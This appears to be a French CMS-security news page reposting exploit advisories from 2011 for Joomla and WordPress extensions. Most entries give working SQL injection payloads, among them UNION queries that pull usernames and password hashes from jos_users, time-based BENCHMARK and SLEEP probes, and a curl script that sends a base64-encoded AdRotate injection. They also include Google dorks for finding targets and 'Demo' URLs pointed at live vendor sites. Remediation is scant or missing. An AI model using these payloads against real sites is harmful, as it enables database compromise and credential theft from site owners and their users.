Actualités Joomla,Wordpress et Drupal

Actualités sur la sécurité des CMS Joomla, Wordpress et Drupal.

QContacts 1.0.6 (Joomla component) SQL injection

08 Décembre 2011

############################################################################

# Exploit Title: *QContacts 1.0.6 (Joomla component) SQL injection*

# Google Dork: inurl:"/components/com_qcontacts/"

# Date: Decembar/08/2011

# Author: Don (BalcanCrew & BalcanHack)

# Software Link: *

http://www.latenight-coding.com/joomla-addons/qcontacts.html*

# Version: 1.0.6

# Tested on: Apache

############################################################################

Vulnerability:

This vulnerability affects /index.php

*

/index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts

*

How to fix this vulnerability:

*Filter metacharacters from user input.*

*~Don 2011*

Joomla Component Jobprofile (com_jobprofile) SQL Injection Vulnerability

02 Décembre 2011

[~] Joomla Component Jobprofile (com_jobprofile) SQL Injection Vulnerability

[~] Author : kaMtiEz ( Cette adresse e-mail est protégée contre les robots des spammeurs, vous devez activer Javascript pour la voir. )

[~] Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id

[~] Date : 2 Dec , 2011

[ Software Information ]

[+] Vendor : http://www.thakkertech.com/

[+] INFO : http://extensions.joomla.org/extensions/ads-a-affiliates/jobs-a-recruitment/11924

[+] Download : http://www.thakkertech.com/products/joomla-extensions/components/jobprofile-joomla-component-detail.html

[+] Version : null / 1.0 maybe :D

[+] Price : 25,00 €

[+] Vulnerability : SQL INJECTION

[+] Dork : "think it :D"

[+] LOCATION : – INDONESIA -

Lire la suite...

WordPress jetpack plugin SQL Injection Vulnerability

19 Novembre 2011

######################################################

# Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability

# Date: 2011-19-11

# Author: longrifle0x

# software: Wordpress

# Download:http://wordpress.org/extend/plugins/jetpack/

# Tools: SQLMAP

######################################################

*DESCRIPTION

Discovered a vulnerability in jetpack, Wordpress Plugin,

vulnerability is SQL injection.

File:wp-content/plugins/jetpack/modules/sharedaddy.php

Exploit: id=-1; or 1=if

*Exploitation*http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php

[GET][id=-1][CURRENT_USER()http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php

[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)

http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php

[GET][id=-1][MID((VERSION()),1,6)

WordPress AdRotate plugin SQL Injection Vulnerability

17 Novembre 2011

# Exploit Title: WordPress AdRotate plugin <= 3.6.6 SQL Injection Vulnerability

# Date: 2011-11-8

# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)

# Software Link: http://downloads.wordpress.org/plugin/adrotate.3.6.6.zip

# Version: 3.6.6 (tested)

# Note: parameter $_GET["track"] has to be Base64 encoded

---

PoC

---

http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj

e.g.

#!/bin/bash

payload="1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#"

encoded='echo -n "1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#" | base64 -w 0'

curl http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=$encoded

---------------

Vulnerable code

---------------

if(isset($_GET['track']) OR $_GET['track'] != '') {

$meta = base64_decode($_GET['track']);

...

list($ad, $group, $block) = explode("-", $meta);

...

$bannerurl = $wpdb->get_var($wpdb->prepare("SELECT 'link' FROM '".$prefix."adrotate' WHERE 'id' = '".$ad."' LIMIT 1;")); //wrong (mis)usage of wpdb->prepare()

Wordpress Zingiri Web Shop Plugin Remote Code Execution Exploit

17 Novembre 2011

/*

------------------------------------------------------------------------

Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Exploit

------------------------------------------------------------------------

author...............: Egidio Romano aka EgiX

mail.................: n0b0d13s[at]gmail[dot]com

software link........: http://wordpress.org/extend/plugins/zingiri-web-shop/

affected versions....: from 0.9.12 to 2.2.3

+-------------------------------------------------------------------------+

| This proof of concept code was written for educational purpose only. |

| Use it at your own risk. Author will be not responsible for any damage. |

+-------------------------------------------------------------------------+

Lire la suite...

Joomla ALFContact 1.9.3 Extension Multiple Cross-Site Scripting (XSS) vulnerabilities

17 Novembre 2011

============================================================

FOREGROUND SECURITY, SECURITY ADVISORY 2011-003

- Original release date: Nomvember 9, 2011

- Discovered by: Jose Carlos de Arriba (Sr Security Analyst at Foreground Security)

- Contact: (jcarriba (at) foregroundsecurity (dot) com, dade (at) painsec (dot) com)

- Twitter: @jcarriba

- Severity: 4.3/10 (Base CVSS Score)

============================================================

I. VULNERABILITY

-------------------------

Joomla ALFContact 1.9.3 Extension Multiple Cross-Site Scripting (XSS) vulnerabilities - (prior versions have not been checked but could be vulnerable too).

Lire la suite...

WordPress WP Glossary plugin SQL Injection Vulnerability

08 Novembre 2011

######################################################
# Exploit Title: WordPress WP Glossary plugin SQL Injection Vulnerability
# Date: 2011-30-10
# Author: longrifle0x
# software: Wordpress
# Download: http://wordpress.org/extend/plugins/wp-glossary/
# Tools: SQLMAP
######################################################

*DESCRIPTIONDiscovered a vulnerability in WP Glossary, Wordpress Plugin,
vulnerability is SQL injection.
File: wp-content/plugins/wp-glossary/ajax.php
Exploit: id=-1; or 1=if

*Exploitation*
http://localhost:80/wp-content/plugins/wp-glossary/ajax.php
[GET][id=-1][CURRENT_USER()
http://localhost:80/wp-content/plugins/wp-glossary/ajax.php
[GET][id=-1][SELECT
(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT
0,1)='Y') THEN 1 ELSE 0 END)
http://localhost:80/
wp-content/plugins/wp-glossary/ajax.php [GET][id=-1][MID((VERSION()),1,6)

Joomla Component Alameda (com_alameda) SQL Injection Vulnerability

08 Novembre 2011

[~] Joomla Component Alameda (com_alameda) SQL Injection Vulnerability
[~] Author : kaMtiEz ( Cette adresse e-mail est protégée contre les robots des spammeurs, vous devez activer Javascript pour la voir. )
[~] Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id
[~] Date : 1 Nov , 2011

[ Software Information ]

[+] Vendor : http://www.blueflyingfish.com/alameda/
[+] INFO : http://extensions.joomla.org/extensions/e-commerce/e-commerce-bridges/18018
[+] Download : http://www.blueflyingfish.com/alameda/index.php?option=com_content&view=article&id=3
[+] version : 1.0
[+] Vulnerability : SQL INJECTION
[+] Dork : "CiHuY"
[+] LOCATION : - INDONESIA -


[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/index.php?option=com_alameda&controller=comments&task=edit&storeid=1[SQL]

[ XpL ]

http://127.0.0.1/[kaMtiEz]/index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users--

[ Demo ]

http://www.blueflyingfish.com/alameda/index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users--

[ FIX ]

dunno :">

Joomla Compenent com_hmcommunity Multiple Vulnerabilities

08 Novembre 2011

# [+] Joomla Compenent com_hmcommunity Multiple Vulnerabilities
# [+] Software : Joomla
# [+] Download : http://joomlaextensions.co.in/product/HM-Community
# [+] Author : 599eme Man
# [+] Contact : Cette adresse e-mail est protégée contre les robots des spammeurs, vous devez activer Javascript pour la voir.
#
#[------------------------------------------------------------------------------------]
#
# [+] Vulnerabilities
#
# [+] SQL
#
# - http://site.com/index.php?option=com_hmcommunity&view=fnd_home&id=[NB] union select all 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
#
# [+] Demo
#
# - http://www.hmcommunity.harmistechnology.com/index.php?option=com_hmcommunity&view=fnd_home&id=155 union select all 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
#
# [+] Blind SQL
#
# - http://site.com//index.php?option=com_hmcommunity&view=fnd_home&id=155 and @@version=5
#
# [+] Demo
#
# - http://www.hmcommunity.harmistechnology.com/index.php?option=com_hmcommunity&view=fnd_home&id=155%20and%20@@version=5
#
# [+] Persistent XSS
#
# - The XSS is on the profile. You have to create an account and put your code in inputs.
#
# [+] Demo
#
# - Create an account and look this profile : http://www.hmcommunity.harmistechnology.com/index.php?option=com_hmcommunity&view=fnd_profile&uid=155
#
#[------------------------------------------------------------------------------------]
#
#########################################################################################################

Techfolio 1.0 Component Joomla SQL Injection

08 Novembre 2011

###################################################################
Techfolio 1.0 Component Joomla SQL Injection
###################################################################

Release Date Bug. 27-Oct-2011
Date Added. 30-Sep-2011
Vendor Notification Date. Never
Product. Techfolio
Platform. Joomla
Affected versions. 1.0
Type. Non-Commercial
Attack Vector. Sql Injection
Solution Status. unpublished
CVE reference. Not yet assigned
Download. techdeluge.com/joomla-component/com_techfolio.zip

Lire la suite...

Joomla mod_adsense modules SQL Injection Vulnerability

30 Octobre 2011

*************************************************************************************
# Exploit Title: Joomla mod_adsense modules SQL Injection Vulnerability
# Date: 2011-29-10
# Author: longrifle0x
# software: Joomla
# Tools: SQLMAP
# Exploit: id=-1; or 1=if
*************************************************************************************
http://localhost/modules/mod_adsense/mod_adsense.php
http://localhost/modules/mod_adsense/mod_adsense.php [GET][id=-1]UNION ALL SELECT 1, 2, 3, CONCAT_WS(CHAR(58,106,97,115,58),CHAR(110,76,105,102,69,111,79,87,114,97),CHAR(58,111,99,109,58))#---
http://localhost/modules/mod_adsense/mod_adsense.php [GET][id=-1][MID((VERSION()),1,6)

Vik Real Estate 1.0 Component Joomla Multiple Blind Sql Injection

30 Octobre 2011

###################################################################
Vik Real Estate 1.0 Component Joomla Multiple Blind Sql Injection
###################################################################

Release Date Bug. 27-Oct-2011
Date Added. 30-Sep-2011
Vendor Notification Date. Never
Product. Vik Real Estate
Platform. Joomla
Affected versions. 1.0
Type. Commercial
Price. €69.00
Attack Vector. Blind Sql Injection
Solution Status. unpublished
CVE reference. Not yet assigned
Download http://www.extensionsforjoomla.com/vik-real-estate/joomla-extensions/vik-real-estate?vmcchk=1

I. BACKGROUND

Extension to manage real estates with details and description.
Main Functions:
- Manage Types of Contract (rental, selling, etc.)
- Condition of use (commercial, residential, etc.)
- Types of houses (apartment, villa, etc.)
- Manage Features (garden, garage, pool, etc. with icons)
- Manage States/Cities and Areas (New York City, Soho. Florence, Airport etc.)
Add real estates with description and images.
Search module included.

II. DESCRIPTION

Two vulnerabilities have been discovered in Vik Real Estate, joomla component,
the 2 vulnerabilities are blind injections (boolean-based time-based blind & blind)

The parameters affected are:
contract
imm

III. EXPLOITATION


parameter [contract]:

//index.php?option=com_vikrealestate&act=results&contract=1' AND 1=1 AND '666'='666&adibit=1&prov=1&area=_any&pricemin=_any&pricemax=_any&mqmin=0&mqmax=_any&type=_any&gores=Search

parameter [imm]:

//index.php?option=com_vikrealestate&act=show&imm=3' AND 1=1 AND '666'='666



Discovered by.
Chris Russell

JEEMA SMS 3.2 Component Joomla Multiple Vulnerabilities

30 Octobre 2011

###################################################################
JEEMA SMS 3.2 Component Joomla Multiple Vulnerabilities
###################################################################

Release Date Bug. 28-Oct-2011
Date Added. 30-January-2010
Vendor Notification Date. Never
Product. JEEMA SMS
Platform. Joomla
Affected versions. 3.2
Type. Commercial
Price. $115.00
Attack Vector. Multiple
Solution Status. unpublished
CVE reference. Not yet assigned
Download. http://www.shopping.jeema.net/index.php?main_page=product_info&cPath=1&products_id=2&zenid=dc8442eed192c973fe776f9cd16a1a6c

Lire la suite...

Barter Sites 1.3 Component Joomla SQL Injection & Persistent XSS vulnerabilities

30 Octobre 2011

####################################################################################
Barter Sites 1.3 Component Joomla SQL Injection & Persistent XSS vulnerabilities
####################################################################################

Release Date Bug. 28-Oct-2011
Date Added. 01-Oct-2011
Vendor Notification Date. Never
Product. Barter Sites
Platform. Joomla
Affected versions. 1.3
Type. Commercial
Price. $99
Attack Vector. Sql Injection & Persistent XSS
Solution Status. unpublished
CVE reference. Not yet assigned
Download. www.barter-sites.com/content/getStarted

Lire la suite...

Techfolio 1.0 Component Joomla SQL Injection

30 Octobre 2011

###################################################################
Techfolio 1.0 Component Joomla SQL Injection
###################################################################

Release Date Bug. 27-Oct-2011
Date Added. 30-Sep-2011
Vendor Notification Date. Never
Product. Techfolio
Platform. Joomla
Affected versions. 1.0
Type. Non-Commercial
Attack Vector. Sql Injection
Solution Status. unpublished
CVE reference. Not yet assigned
Download. techdeluge.com/joomla-component/com_techfolio.zip

Lire la suite...

WordPress wptouch plugin SQL Injection Vulnerability

27 Octobre 2011

# Exploit Title: WordPress wptouch plugin SQL Injection Vulnerability
# Date: 2011-27-10
# Author: longrifle0x
# software: Wordpress
# Tools: SQLMAP
---------------
(POST data)
---------------

http://www.site.com/wp-content/plugins/wptouch/ajax.php

#Exploit: id=-1; id=- AND SLEEP(5) or 1=if

http://site.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][CURRENT_USER()

http://site.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][SELECT
(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT
0,1)='Y') THEN 1 ELSE 0 END)

http://site.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][MID((VERSION()),1,6)

Plus d'articles...